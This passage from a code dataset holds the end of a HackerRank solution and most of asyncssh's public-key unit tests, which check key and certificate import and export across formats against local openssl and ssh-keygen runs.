input().rstrip().split()))\n\n res = minimumSwaps(arr)\n\n fptr.write(str(res) + '\\n')\n\n fptr.close()","repo_name":"nikjohn7/Coding-Challenges","sub_path":"Hackerrank/Python/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"35396213183","text":"import binascii\nfrom datetime import datetime\nimport os\nfrom pathlib import Path\nimport shutil\nimport subprocess\nimport sys\nimport unittest\n\nfrom cryptography.exceptions import UnsupportedAlgorithm\n\nimport asyncssh\n\nfrom asyncssh.asn1 import der_encode, BitString, ObjectIdentifier\nfrom asyncssh.asn1 import TaggedDERObject\nfrom asyncssh.crypto import chacha_available, ed25519_available, ed448_available\nfrom asyncssh.misc import write_file\nfrom asyncssh.packet import MPInt, String, UInt32\nfrom asyncssh.pbe import pkcs1_decrypt\nfrom asyncssh.public_key import CERT_TYPE_USER, CERT_TYPE_HOST, SSHKey\nfrom asyncssh.public_key import SSHX509CertificateChain\nfrom asyncssh.public_key import decode_ssh_certificate\nfrom asyncssh.public_key import get_public_key_algs, get_certificate_algs\nfrom asyncssh.public_key import get_x509_certificate_algs\nfrom asyncssh.public_key import import_certificate_subject\nfrom asyncssh.public_key import load_identities\n\nfrom .sk_stub import sk_available, stub_sk, unstub_sk\nfrom .util import bcrypt_available, get_test_key, x509_available\nfrom .util import make_certificate, run, TempDirTestCase\n\n\n_ES1_SHA1_DES = ObjectIdentifier('1.2.840.113549.1.5.10')\n_P12_RC4_40 = 
ObjectIdentifier('1.2.840.113549.1.12.1.2')\n_ES2 = ObjectIdentifier('1.2.840.113549.1.5.13')\n_ES2_PBKDF2 = ObjectIdentifier('1.2.840.113549.1.5.12')\n_ES2_AES128 = ObjectIdentifier('2.16.840.1.101.3.4.1.2')\n_ES2_DES3 = ObjectIdentifier('1.2.840.113549.3.7')\n\ntry:\n _openssl_version = run('openssl version')\nexcept subprocess.CalledProcessError: # pragma: no cover\n _openssl_version = b''\n\n_openssl_available = _openssl_version != b''\n\nif _openssl_available: # pragma: no branch\n _openssl_curves = run('openssl ecparam -list_curves')\nelse: # pragma: no cover\n _openssl_curves = b''\n\n# The openssl \"-v2prf\" option is only available in OpenSSL 1.0.2 or later\n_openssl_supports_v2prf = _openssl_version >= b'OpenSSL 1.0.2'\n\n# Ed25519/Ed448 support via \"pkey\" is only available in OpenSSL 1.1.1 or later\n_openssl_supports_pkey = _openssl_version >= b'OpenSSL 1.1.1'\n\nif _openssl_version >= b'OpenSSL 3': # pragma: no branch\n _openssl_legacy = '-provider default -provider legacy '\nelse: # pragma: no cover\n _openssl_legacy = ''\n\ntry:\n if sys.platform != 'win32':\n _openssh_version = run('ssh -V')\n else: # pragma: no cover\n _openssh_version = b''\nexcept subprocess.CalledProcessError: # pragma: no cover\n _openssh_version = b''\n\n_openssh_available = _openssh_version != b''\n\n# GCM & Chacha tests require OpenSSH 6.9 due to a bug in earlier versions:\n# https://bugzilla.mindrot.org/show_bug.cgi?id=2366\n_openssh_supports_gcm_chacha = _openssh_version >= b'OpenSSH_6.9'\n_openssh_supports_arcfour_blowfish_cast = (_openssh_available and\n _openssh_version < b'OpenSSH_7.6')\n\npkcs1_ciphers = (('aes128-cbc', '-aes128', False),\n ('aes192-cbc', '-aes192', False),\n ('aes256-cbc', '-aes256', False),\n ('des-cbc', '-des', True),\n ('des3-cbc', '-des3', False))\n\npkcs8_ciphers = (\n ('aes128-cbc', 'sha224', 2, '-v2 aes-128-cbc '\n '-v2prf hmacWithSHA224', _openssl_supports_v2prf, False),\n ('aes128-cbc', 'sha256', 2, '-v2 aes-128-cbc '\n '-v2prf hmacWithSHA256', _openssl_supports_v2prf, False),\n ('aes128-cbc', 'sha384', 2, '-v2 aes-128-cbc '\n '-v2prf hmacWithSHA384', _openssl_supports_v2prf, False),\n ('aes128-cbc', 'sha512', 2, '-v2 aes-128-cbc '\n '-v2prf hmacWithSHA512', _openssl_supports_v2prf, False),\n ('des-cbc', 'md5', 1, '-v1 PBE-MD5-DES',\n _openssl_available, True),\n ('des-cbc', 'sha1', 1, '-v1 PBE-SHA1-DES',\n _openssl_available, True),\n ('des2-cbc', 'sha1', 1, '-v1 PBE-SHA1-2DES',\n _openssl_available, False),\n ('des3-cbc', 'sha1', 1, '-v1 PBE-SHA1-3DES',\n _openssl_available, False),\n ('rc4-40', 'sha1', 1, '-v1 PBE-SHA1-RC4-40',\n _openssl_available, True),\n ('rc4-128', 'sha1', 1, '-v1 PBE-SHA1-RC4-128',\n _openssl_available, True),\n ('aes128-cbc', 'sha1', 2, '-v2 aes-128-cbc',\n _openssl_available, False),\n ('aes192-cbc', 'sha1', 2, '-v2 aes-192-cbc',\n _openssl_available, False),\n ('aes256-cbc', 'sha1', 2, '-v2 aes-256-cbc',\n _openssl_available, False),\n ('blowfish-cbc', 'sha1', 2, '-v2 bf-cbc',\n _openssl_available, True),\n ('cast128-cbc', 'sha1', 2, '-v2 cast-cbc',\n _openssl_available, True),\n ('des-cbc', 'sha1', 2, '-v2 des-cbc',\n _openssl_available, True),\n ('des3-cbc', 'sha1', 2, '-v2 des-ede3-cbc',\n _openssl_available, False))\n\nopenssh_ciphers = (\n ('aes128-gcm@openssh.com', _openssh_supports_gcm_chacha),\n ('aes256-gcm@openssh.com', _openssh_supports_gcm_chacha),\n ('arcfour', _openssh_supports_arcfour_blowfish_cast),\n ('arcfour128', _openssh_supports_arcfour_blowfish_cast),\n ('arcfour256', _openssh_supports_arcfour_blowfish_cast),\n 
('blowfish-cbc', _openssh_supports_arcfour_blowfish_cast),\n ('cast128-cbc', _openssh_supports_arcfour_blowfish_cast),\n ('aes128-cbc', _openssh_available),\n ('aes192-cbc', _openssh_available),\n ('aes256-cbc', _openssh_available),\n ('aes128-ctr', _openssh_available),\n ('aes192-ctr', _openssh_available),\n ('aes256-ctr', _openssh_available),\n ('3des-cbc', _openssh_available)\n)\n\nif chacha_available: # pragma: no branch\n openssh_ciphers += (('chacha20-poly1305@openssh.com',\n _openssh_supports_gcm_chacha),)\n\n\ndef select_passphrase(cipher, pbe_version=0):\n \"\"\"Randomize between string and bytes version of passphrase\"\"\"\n\n if cipher is None:\n return None\n elif os.urandom(1)[0] & 1:\n return 'passphrase'\n elif pbe_version == 1 and cipher in ('des2-cbc', 'des3-cbc',\n 'rc4-40', 'rc4-128'):\n return 'passphrase'.encode('utf-16-be')\n else:\n return 'passphrase'.encode('utf-8')\n\n\nclass _TestPublicKey(TempDirTestCase):\n \"\"\"Unit tests for public key modules\"\"\"\n\n # pylint: disable=too-many-public-methods\n\n keyclass = None\n base_format = None\n private_formats = ()\n public_formats = ()\n default_cert_version = ''\n x509_supported = False\n generate_args = ()\n single_cipher = True\n use_openssh = _openssh_available\n use_openssl = _openssl_available\n\n def __init__(self, methodName='runTest'):\n super().__init__(methodName)\n\n self.privkey = None\n self.pubkey = None\n self.privca = None\n self.pubca = None\n self.usercert = None\n self.hostcert = None\n self.rootx509 = None\n self.userx509 = None\n self.hostx509 = None\n self.otherx509 = None\n\n def make_certificate(self, *args, **kwargs):\n \"\"\"Construct an SSH certificate\"\"\"\n\n return make_certificate(self.default_cert_version, *args, **kwargs)\n\n def validate_openssh(self, cert, cert_type, name):\n \"\"\"Check OpenSSH certificate validation\"\"\"\n\n self.assertIsNone(cert.validate(cert_type, name))\n\n def validate_x509(self, cert, user_principal=None):\n \"\"\"Check X.509 certificate validation\"\"\"\n\n self.assertIsNone(cert.validate_chain([], [self.rootx509], [], 'any',\n user_principal, None))\n\n with self.assertRaises(ValueError):\n cert.validate_chain([self.rootx509], [], [], 'any', None, None)\n\n chain = SSHX509CertificateChain.construct_from_certs([cert])\n self.assertEqual(chain, decode_ssh_certificate(chain.public_data))\n\n self.assertIsNone(chain.validate_chain([self.rootx509], [], [], 'any',\n user_principal, None))\n\n self.assertIsNone(chain.validate_chain([self.rootx509],\n [], [self.otherx509], 'any',\n user_principal, None))\n\n with self.assertRaises(ValueError):\n chain.validate_chain([], [], [], 'any', user_principal, None)\n\n with self.assertRaises(ValueError):\n chain.validate_chain([self.rootx509], [], [cert], 'any',\n user_principal, None)\n\n def check_private(self, format_name, passphrase=None):\n \"\"\"Check for a private key match\"\"\"\n\n newkey = asyncssh.read_private_key('new', passphrase)\n algorithm = newkey.get_algorithm()\n keydata = newkey.export_private_key()\n pubdata = newkey.public_data\n\n self.assertEqual(newkey, self.privkey)\n self.assertEqual(hash(newkey), hash(self.privkey))\n\n keypair = asyncssh.load_keypairs(newkey, passphrase)[0]\n self.assertEqual(keypair.get_key_type(), 'local')\n self.assertEqual(keypair.get_algorithm(), algorithm)\n self.assertEqual(keypair.public_data, pubdata)\n self.assertIsNotNone(keypair.get_agent_private_key())\n\n keypair = asyncssh.load_keypairs([keypair])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n 
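For orientation, the assertions in this helper amount to an export/import round trip on the same key material. A standalone sketch of that idea using asyncssh's public API, independent of the fixtures in this test:

    import asyncssh

    key = asyncssh.generate_private_key('ssh-rsa')
    pem = key.export_private_key('pkcs8-pem', 'passphrase')
    restored = asyncssh.import_private_key(pem, 'passphrase')
    assert restored.public_data == key.public_data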
keypair = asyncssh.load_keypairs(keydata)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs('new', passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([newkey])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([(newkey, None)])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([keydata])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([(keydata, None)])[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs(['new'], passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([('new', None)], passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs(Path('new'), passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([Path('new')], passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keypair = asyncssh.load_keypairs([(Path('new'), None)], passphrase)[0]\n self.assertEqual(keypair.public_data, pubdata)\n\n keylist = asyncssh.load_keypairs([])\n self.assertEqual(keylist, [])\n\n if passphrase:\n with self.assertRaises((asyncssh.KeyEncryptionError,\n asyncssh.KeyImportError)):\n asyncssh.load_keypairs('new', 'xxx')\n\n if format_name == 'openssh':\n identities = load_identities(['new'])\n self.assertEqual(identities[0], pubdata)\n else:\n with self.assertRaises(asyncssh.KeyImportError):\n load_identities(['new'])\n\n identities = load_identities(['new'], skip_private=True)\n self.assertEqual(identities, [])\n else:\n newkey.write_private_key('list', format_name)\n newkey.append_private_key('list', format_name)\n\n keylist = asyncssh.read_private_key_list('list')\n self.assertEqual(keylist[0].public_data, pubdata)\n self.assertEqual(keylist[1].public_data, pubdata)\n\n newkey.write_private_key(Path('list'), format_name)\n newkey.append_private_key(Path('list'), format_name)\n\n keylist = asyncssh.load_keypairs(Path('list'))\n self.assertEqual(keylist[0].public_data, pubdata)\n self.assertEqual(keylist[1].public_data, pubdata)\n\n if self.x509_supported and format_name[-4:] == '-pem':\n cert = newkey.generate_x509_user_certificate(newkey, 'OU=user')\n chain = SSHX509CertificateChain.construct_from_certs([cert])\n\n cert.write_certificate('new_cert')\n\n keypair = asyncssh.load_keypairs(('new', 'new_cert'), passphrase)[0]\n self.assertEqual(keypair.public_data, chain.public_data)\n self.assertIsNotNone(keypair.get_agent_private_key())\n\n keypair = asyncssh.load_keypairs('new', passphrase, 'new_cert')[0]\n self.assertEqual(keypair.public_data, chain.public_data)\n self.assertIsNotNone(keypair.get_agent_private_key())\n\n newkey.write_private_key('new_bundle', format_name, passphrase)\n cert.append_certificate('new_bundle', 'pem')\n\n keypair = asyncssh.load_keypairs('new_bundle', passphrase)[0]\n self.assertEqual(keypair.public_data, chain.public_data)\n\n with self.assertRaises(OSError):\n asyncssh.load_keypairs(('new', 'not_found'), passphrase)\n\n def check_public(self, format_name):\n \"\"\"Check for a public key match\"\"\"\n\n newkey = asyncssh.read_public_key('new')\n pubkey = newkey.export_public_key()\n pubdata = newkey.public_data\n\n self.assertEqual(newkey, self.pubkey)\n self.assertEqual(hash(newkey), hash(self.pubkey))\n\n pubkey = asyncssh.load_public_keys('new')[0]\n self.assertEqual(pubkey, 
newkey)\n\n pubkey = asyncssh.load_public_keys([newkey])[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys([pubkey])[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys(['new'])[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys(Path('new'))[0]\n self.assertEqual(pubkey, newkey)\n\n pubkey = asyncssh.load_public_keys([Path('new')])[0]\n self.assertEqual(pubkey, newkey)\n\n identity = load_identities(['new'])[0]\n self.assertEqual(identity, pubdata)\n\n newkey.write_public_key('list', format_name)\n newkey.append_public_key('list', format_name)\n\n keylist = asyncssh.read_public_key_list('list')\n self.assertEqual(keylist[0], newkey)\n self.assertEqual(keylist[1], newkey)\n\n newkey.write_public_key(Path('list'), format_name)\n newkey.append_public_key(Path('list'), format_name)\n\n write_file('list', b'Extra text at end of key list\\n', 'ab')\n\n keylist = asyncssh.load_public_keys(Path('list'))\n self.assertEqual(keylist[0], newkey)\n self.assertEqual(keylist[1], newkey)\n\n for hash_name in ('md5', 'sha1', 'sha256', 'sha384', 'sha512'):\n fp = newkey.get_fingerprint(hash_name)\n\n if self.use_openssh: # pragma: no branch\n keygen_fp = run('ssh-keygen -l -E %s -f sshpub' % hash_name)\n self.assertEqual(fp, keygen_fp.decode('ascii').split()[1])\n\n with self.assertRaises(ValueError):\n newkey.get_fingerprint('xxx')\n\n def check_certificate(self, cert_type, format_name):\n \"\"\"Check for a certificate match\"\"\"\n\n cert = asyncssh.read_certificate('cert')\n certdata = cert.export_certificate()\n\n self.assertEqual(cert.key, self.pubkey)\n\n if cert.is_x509:\n self.validate_x509(cert)\n else:\n self.validate_openssh(cert, cert_type, 'name')\n\n certlist = asyncssh.load_certificates(cert)\n self.assertEqual(certlist[0], cert)\n self.assertEqual(hash(certlist[0]), hash(cert))\n\n if cert.is_x509:\n self.assertEqual(certlist[0].x509_cert, cert.x509_cert)\n self.assertEqual(hash(certlist[0].x509_cert), hash(cert.x509_cert))\n\n certlist = asyncssh.load_certificates(certdata)\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates([cert])\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates([certdata])\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates('cert')\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates(Path('cert'))\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates([Path('cert')])\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates(certdata +\n b'Extra text in the middle\\n' +\n certdata)\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n\n cert.write_certificate('list', format_name)\n cert.append_certificate('list', format_name)\n\n certlist = asyncssh.load_certificates('list')\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n\n cert.write_certificate(Path('list'), format_name)\n cert.append_certificate(Path('list'), format_name)\n\n write_file('list', b'Extra text at end of certificate list\\n', 'ab')\n\n certlist = asyncssh.load_certificates(Path('list'))\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n\n certlist = asyncssh.load_certificates(['list', [cert]])\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n self.assertEqual(certlist[2], cert)\n\n certlist = asyncssh.load_certificates(['list', certdata])\n 
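# a mixed list (filename plus raw certificate data) expands to\n # all three copies of the same certificate\n 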
self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n self.assertEqual(certlist[2], cert)\n\n if format_name == 'openssh':\n certlist = asyncssh.load_certificates(certdata[:-1])\n self.assertEqual(certlist[0], cert)\n\n certlist = asyncssh.load_certificates(certdata + certdata[:-1])\n self.assertEqual(certlist[0], cert)\n self.assertEqual(certlist[1], cert)\n\n certlist = asyncssh.load_certificates(certdata[1:-1])\n self.assertEqual(len(certlist), 0)\n\n certlist = asyncssh.load_certificates(certdata[1:] + certdata[:-1])\n self.assertEqual(len(certlist), 1)\n self.assertEqual(certlist[0], cert)\n\n\n def import_pkcs1_private(self, fmt, cipher=None, args=None):\n \"\"\"Check import of a PKCS#1 private key\"\"\"\n\n format_name = 'pkcs1-%s' % fmt\n\n if self.use_openssl: # pragma: no branch\n if cipher:\n run('openssl %s %s -in priv -inform pem -out new -outform %s '\n '-passout pass:passphrase' % (self.keyclass, args, fmt))\n else:\n run('openssl %s -in priv -inform pem -out new -outform %s' %\n (self.keyclass, fmt))\n else: # pragma: no cover\n self.privkey.write_private_key('new', format_name,\n select_passphrase(cipher), cipher)\n\n self.check_private(format_name, select_passphrase(cipher))\n\n def export_pkcs1_private(self, fmt, cipher=None, legacy_args=None):\n \"\"\"Check export of a PKCS#1 private key\"\"\"\n\n format_name = 'pkcs1-%s' % fmt\n self.privkey.write_private_key('privout', format_name,\n select_passphrase(cipher), cipher)\n\n if self.use_openssl: # pragma: no branch\n if cipher:\n run('openssl %s %s -in privout -inform %s -out new '\n '-outform pem -passin pass:passphrase' %\n (self.keyclass, legacy_args, fmt))\n else:\n run('openssl %s -in privout -inform %s -out new -outform pem' %\n (self.keyclass, fmt))\n else: # pragma: no cover\n priv = asyncssh.read_private_key('privout',\n select_passphrase(cipher))\n priv.write_private_key('new', format_name)\n\n self.check_private(format_name)\n\n def import_pkcs1_public(self, fmt):\n \"\"\"Check import of a PKCS#1 public key\"\"\"\n\n format_name = 'pkcs1-%s' % fmt\n\n if (not self.use_openssl or self.keyclass == 'dsa' or\n _openssl_version < b'OpenSSL 1.0.0'): # pragma: no cover\n # OpenSSL no longer has support for PKCS#1 DSA, and PKCS#1\n # RSA is not supported before OpenSSL 1.0.0, so we only test\n # against ourselves in these cases.\n\n self.pubkey.write_public_key('new', format_name)\n else:\n run('openssl %s -pubin -in pub -inform pem -RSAPublicKey_out '\n '-out new -outform %s' % (self.keyclass, fmt))\n\n self.check_public(format_name)\n\n def export_pkcs1_public(self, fmt):\n \"\"\"Check export of a PKCS#1 public key\"\"\"\n\n format_name = 'pkcs1-%s' % fmt\n self.privkey.write_public_key('pubout', format_name)\n\n if not self.use_openssl or self.keyclass == 'dsa': # pragma: no cover\n # OpenSSL no longer has support for PKCS#1 DSA, so we can\n # only test against ourselves.\n\n pub = asyncssh.read_public_key('pubout')\n pub.write_public_key('new', 'pkcs1-%s' % fmt)\n else:\n run('openssl %s -RSAPublicKey_in -in pubout -inform %s -out new '\n '-outform pem' % (self.keyclass, fmt))\n\n self.check_public(format_name)\n\n def import_pkcs8_private(self, fmt, openssl_ok=True, cipher=None,\n hash_alg=None, pbe_version=None, args=None):\n \"\"\"Check import of a PKCS#8 private key\"\"\"\n\n format_name = 'pkcs8-%s' % fmt\n\n if self.use_openssl and openssl_ok: # pragma: no branch\n if cipher:\n run('openssl pkcs8 -topk8 %s -in priv -inform pem -out new '\n '-outform %s -passout pass:passphrase' % (args, 
fmt))\n else:\n run('openssl pkcs8 -topk8 -nocrypt -in priv -inform pem '\n '-out new -outform %s' % fmt)\n else: # pragma: no cover\n self.privkey.write_private_key('new', format_name,\n select_passphrase(cipher,\n pbe_version),\n cipher, hash_alg, pbe_version)\n\n self.check_private(format_name, select_passphrase(cipher, pbe_version))\n\n def export_pkcs8_private(self, fmt, openssl_ok=True, cipher=None,\n hash_alg=None, pbe_version=None,\n legacy_args=None):\n \"\"\"Check export of a PKCS#8 private key\"\"\"\n\n format_name = 'pkcs8-%s' % fmt\n self.privkey.write_private_key('privout', format_name,\n select_passphrase(cipher, pbe_version),\n cipher, hash_alg, pbe_version)\n\n if self.use_openssl and openssl_ok: # pragma: no branch\n if cipher:\n run('openssl pkcs8 %s -in privout -inform %s -out new '\n '-outform pem -passin pass:passphrase' %\n (legacy_args, fmt))\n else:\n run('openssl pkcs8 -nocrypt -in privout -inform %s -out new '\n '-outform pem' % fmt)\n else: # pragma: no cover\n priv = asyncssh.read_private_key('privout',\n select_passphrase(cipher,\n pbe_version))\n priv.write_private_key('new', format_name)\n\n self.check_private(format_name)\n\n def import_pkcs8_public(self, fmt):\n \"\"\"Check import of a PKCS#8 public key\"\"\"\n\n format_name = 'pkcs8-%s' % fmt\n\n if self.use_openssl:\n if _openssl_supports_pkey:\n run('openssl pkey -pubin -in pub -inform pem -out new '\n '-outform %s' % fmt)\n else: # pragma: no cover\n run('openssl %s -pubin -in pub -inform pem -out new '\n '-outform %s' % (self.keyclass, fmt))\n else: # pragma: no cover\n self.pubkey.write_public_key('new', format_name)\n\n self.check_public(format_name)\n\n def export_pkcs8_public(self, fmt):\n \"\"\"Check export of a PKCS#8 public key\"\"\"\n\n format_name = 'pkcs8-%s' % fmt\n self.privkey.write_public_key('pubout', format_name)\n\n if self.use_openssl:\n if _openssl_supports_pkey:\n run('openssl pkey -pubin -in pubout -inform %s -out new '\n '-outform pem' % fmt)\n else: # pragma: no cover\n run('openssl %s -pubin -in pubout -inform %s -out new '\n '-outform pem' % (self.keyclass, fmt))\n else: # pragma: no cover\n pub = asyncssh.read_public_key('pubout')\n pub.write_public_key('new', format_name)\n\n self.check_public(format_name)\n\n def import_openssh_private(self, openssh_ok=True, cipher=None):\n \"\"\"Check import of an OpenSSH private key\"\"\"\n\n if self.use_openssh and openssh_ok: # pragma: no branch\n shutil.copy('priv', 'new')\n\n if cipher:\n run('ssh-keygen -p -a 1 -N passphrase -Z %s -o -f new' %\n cipher)\n else:\n run('ssh-keygen -p -N \"\" -o -f new')\n else: # pragma: no cover\n self.privkey.write_private_key('new', 'openssh',\n select_passphrase(cipher), cipher,\n rounds=1, ignore_few_rounds=True)\n\n self.check_private('openssh', select_passphrase(cipher))\n\n def export_openssh_private(self, openssh_ok=True, cipher=None):\n \"\"\"Check export of an OpenSSH private key\"\"\"\n\n self.privkey.write_private_key('new', 'openssh',\n select_passphrase(cipher), cipher,\n rounds=1, ignore_few_rounds=True)\n\n if self.use_openssh and openssh_ok: # pragma: no branch\n os.chmod('new', 0o600)\n\n if cipher:\n run('ssh-keygen -p -P passphrase -N \"\" -o -f new')\n else:\n run('ssh-keygen -p -N \"\" -o -f new')\n else: # pragma: no cover\n priv = asyncssh.read_private_key('new', select_passphrase(cipher))\n priv.write_private_key('new', 'openssh')\n\n self.check_private('openssh')\n\n def import_openssh_public(self):\n \"\"\"Check import of an OpenSSH public key\"\"\"\n\n shutil.copy('sshpub', 
'new')\n\n self.check_public('openssh')\n\n def export_openssh_public(self):\n \"\"\"Check export of an OpenSSH public key\"\"\"\n\n self.privkey.write_public_key('pubout', 'openssh')\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -e -f pubout -m rfc4716 > new')\n else: # pragma: no cover\n pub = asyncssh.read_public_key('pubout')\n pub.write_public_key('new', 'rfc4716')\n\n self.check_public('openssh')\n\n def import_openssh_certificate(self, cert_type, cert):\n \"\"\"Check import of an OpenSSH certificate\"\"\"\n\n shutil.copy(cert, 'cert')\n\n self.check_certificate(cert_type, 'openssh')\n\n def export_openssh_certificate(self, cert_type, cert):\n \"\"\"Check export of an OpenSSH certificate\"\"\"\n\n cert.write_certificate('certout', 'openssh')\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -e -f certout -m rfc4716 > cert')\n else: # pragma: no cover\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'rfc4716')\n\n self.check_certificate(cert_type, 'openssh')\n\n def import_rfc4716_public(self):\n \"\"\"Check import of an RFC4716 public key\"\"\"\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -e -f sshpub -m rfc4716 > new')\n else: # pragma: no cover\n self.pubkey.write_public_key('new', 'rfc4716')\n\n self.check_public('rfc4716')\n\n pubdata = self.pubkey.export_public_key('rfc4716')\n write_file('new', pubdata.replace(b'\\n', b'\\nXXX:\\n', 1))\n\n self.check_public('rfc4716')\n\n def export_rfc4716_public(self):\n \"\"\"Check export of an RFC4716 public key\"\"\"\n\n self.pubkey.write_public_key('pubout', 'rfc4716')\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -i -f pubout -m rfc4716 > new')\n else: # pragma: no cover\n pub = asyncssh.read_public_key('pubout')\n pub.write_public_key('new', 'openssh')\n\n self.check_public('rfc4716')\n\n def import_rfc4716_certificate(self, cert_type, cert):\n \"\"\"Check import of an RFC4716 certificate\"\"\"\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -e -f %s -m rfc4716 > cert' % cert)\n else: # pragma: no cover\n if cert_type == CERT_TYPE_USER:\n cert = self.usercert\n else:\n cert = self.hostcert\n\n cert.write_certificate('cert', 'rfc4716')\n\n self.check_certificate(cert_type, 'rfc4716')\n\n def export_rfc4716_certificate(self, cert_type, cert):\n \"\"\"Check export of an RFC4716 certificate\"\"\"\n\n cert.write_certificate('certout', 'rfc4716')\n\n if self.use_openssh: # pragma: no branch\n run('ssh-keygen -i -f certout -m rfc4716 > cert')\n else: # pragma: no cover\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'openssh')\n\n self.check_certificate(cert_type, 'rfc4716')\n\n\n def import_der_x509_certificate(self, cert_type, cert):\n \"\"\"Check import of a DER X.509 certificate\"\"\"\n\n cert.write_certificate('cert', 'der')\n self.check_certificate(cert_type, 'der')\n\n def export_der_x509_certificate(self, cert_type, cert):\n \"\"\"Check export of a DER X.509 certificate\"\"\"\n\n cert.write_certificate('certout', 'der')\n\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'openssh')\n\n self.check_certificate(cert_type, 'der')\n\n def import_pem_x509_certificate(self, cert_type, cert, trusted=False):\n \"\"\"Check import of a PEM X.509 certificate\"\"\"\n\n cert.write_certificate('cert', 'pem')\n\n if trusted:\n with open('cert') as f:\n lines = f.readlines()\n\n lines[0] = lines[0][:11] + 'TRUSTED ' + lines[0][11:]\n\n idx = lines[-2].find('=')\n lines[-2] = 
lines[-2][:idx] + 'XXXX' + lines[-2][idx:]\n\n lines[-1] = lines[-1][:9] + 'TRUSTED ' + lines[-1][9:]\n\n with open('cert', 'w') as f:\n f.writelines(lines)\n\n self.check_certificate(cert_type, 'pem')\n\n def export_pem_x509_certificate(self, cert_type, cert):\n \"\"\"Check export of a PEM X.509 certificate\"\"\"\n\n cert.write_certificate('certout', 'pem')\n\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'openssh')\n\n self.check_certificate(cert_type, 'pem')\n\n def import_openssh_x509_certificate(self, cert_type, cert):\n \"\"\"Check import of an OpenSSH X.509 certificate\"\"\"\n\n cert.write_certificate('cert')\n self.check_certificate(cert_type, 'openssh')\n\n def export_openssh_x509_certificate(self, cert_type, cert):\n \"\"\"Check export of an OpenSSH X.509 certificate\"\"\"\n\n cert.write_certificate('certout')\n\n cert = asyncssh.read_certificate('certout')\n cert.write_certificate('cert', 'pem')\n\n self.check_certificate(cert_type, 'openssh')\n\n def check_encode_errors(self):\n \"\"\"Check error code paths in key encoding\"\"\"\n\n for fmt in ('pkcs1-der', 'pkcs1-pem', 'pkcs8-der', 'pkcs8-pem',\n 'openssh', 'rfc4716', 'xxx'):\n with self.subTest('Encode private from public (%s)' % fmt):\n with self.assertRaises(asyncssh.KeyExportError):\n self.pubkey.export_private_key(fmt)\n\n with self.subTest('Encode with unknown key format'):\n with self.assertRaises(asyncssh.KeyExportError):\n self.privkey.export_public_key('xxx')\n\n with self.subTest('Encode encrypted pkcs1-der'):\n with self.assertRaises(asyncssh.KeyExportError):\n self.privkey.export_private_key('pkcs1-der', 'x')\n\n if self.keyclass == 'ec':\n with self.subTest('Encode EC public key with PKCS#1'):\n with self.assertRaises(asyncssh.KeyExportError):\n self.privkey.export_public_key('pkcs1-pem')\n\n if 'pkcs1' in self.private_formats:\n with self.subTest('Encode with unknown PKCS#1 cipher'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('pkcs1-pem', 'x', 'xxx')\n\n if 'pkcs8' in self.private_formats: # pragma: no branch\n with self.subTest('Encode with unknown PKCS#8 cipher'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('pkcs8-pem', 'x', 'xxx')\n\n with self.subTest('Encode with unknown PKCS#8 hash'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('pkcs8-pem', 'x',\n 'aes128-cbc', 'xxx')\n\n with self.subTest('Encode with unknown PKCS#8 version'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('pkcs8-pem', 'x',\n 'aes128-cbc', 'sha1', 3)\n\n if bcrypt_available: # pragma: no branch\n with self.subTest('Encode with unknown openssh cipher'):\n with self.assertRaises(asyncssh.KeyEncryptionError):\n self.privkey.export_private_key('openssh', 'x', 'xxx')\n\n with self.subTest('Encode agent cert private from public'):\n with self.assertRaises(asyncssh.KeyExportError):\n self.pubkey.encode_agent_cert_private()\n\n def check_decode_errors(self):\n \"\"\"Check error code paths in key decoding\"\"\"\n\n private_errors = [\n ('Non-ASCII', '\\xff'),\n ('Incomplete ASN.1', b''),\n ('Invalid PKCS#1', der_encode(None)),\n ('Invalid PKCS#1 params',\n 